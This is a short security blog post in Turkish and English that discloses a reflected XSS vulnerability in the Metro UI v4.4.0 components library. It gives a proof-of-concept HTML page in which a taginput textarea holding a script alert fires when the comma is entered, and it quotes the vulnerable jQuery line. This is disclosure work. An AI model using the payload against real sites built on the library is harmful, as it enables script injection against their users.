|

Metro UI v4.4.0 Components Library Reflected XSS Injection



Ali Can Gönüllü tarafından 2022-09-23 18:38:30 tarihinde yazıldı. Tahmini okunma süresi 51 saniye.



Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.

Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.

# Exploit Title:  Metro UI v4.4.0 Components Library Reflected XSS Injection
# Date: 09-19-2022
# Exploit Author: Ali Can Gonullu / Defans Security, Turkey
# Vendor Homepage: https://metroui.org.ua/intro.html
# Software Link: https://metroui.org.ua/intro.html
# Version: v4.4.0-v4.5.x (REQUIRED)
# Tested on: Windows 10 x64
# Video :  https://youtu.be/_wzGVpX54Rc 
 
PoC :
<head>
<title>Exploit PoC</title>
<link rel="stylesheet" href="https://cdn.korzh.com/metroui/v4.5.1/css/metro-all.min.css">
<script src="https://cdn.korzh.com/metroui/v4.5.1/js/metro.min.js"></script>
</head>


<body>
<textarea data-role="taginput" name="kuralicerik" cols="60" rows="10"><script>alert(0)</script>,</textarea>
</body>
Write exploit code to textarea and touch to comma button
Exploit Code :
 
That textarea triggering to a javascript code
Vulnerable code : container = $("<div>").addClass("tag-input "  + element[0].className).addClass(o.clsComponent).insertBefore(element);
element.appendTo(container);